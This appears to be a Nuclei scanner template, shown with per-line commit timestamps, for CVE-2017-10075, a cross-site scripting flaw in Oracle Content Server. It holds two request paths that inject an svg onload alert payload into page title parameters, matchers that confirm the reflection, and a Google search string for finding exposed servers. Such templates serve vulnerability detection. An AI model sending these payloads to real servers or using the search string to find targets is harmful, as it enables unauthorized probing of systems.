2021-01-02 05:02:50 +00:00
id : CVE-2017-10075
2020-07-31 17:53:22 +00:00
info :
2022-10-26 07:33:37 +00:00
name : Oracle Content Server - Cross-Site Scripting
2020-07-31 17:53:22 +00:00
author : madrobot
2021-09-10 11:26:40 +00:00
severity : high
2022-10-26 07:33:37 +00:00
description : |
Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
2022-04-15 16:39:44 +00:00
reference :
- http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
2022-07-01 10:02:07 +00:00
- http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940
2022-10-26 07:33:37 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 8.2
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-10075
2022-10-26 07:33:37 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-01-24 10:08:35 +00:00
google-query : inurl:"/cs/idcplg"
2023-06-04 08:13:42 +00:00
verified : true
2022-04-15 16:39:44 +00:00
tags : cve,cve2017,xss,oracle
2020-07-31 17:53:22 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-07-31 17:53:22 +00:00
- method : GET
path :
2022-10-26 07:33:37 +00:00
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"
2020-07-31 17:53:22 +00:00
2022-10-26 07:33:37 +00:00
stop-at-first-match : true
2020-07-31 17:53:22 +00:00
matchers-condition : and
matchers :
2022-10-26 07:33:37 +00:00
- type : word
part : body
words :
- "<svg/onload=alert(document.domain)>"
- "ORACLE_QUERY"
condition : and
- type : word
part : header
words :
- text/html
2020-07-31 17:53:22 +00:00
- type : status
status :
- 200
2022-04-15 16:39:44 +00:00
# Enhanced by mp on 2022/04/12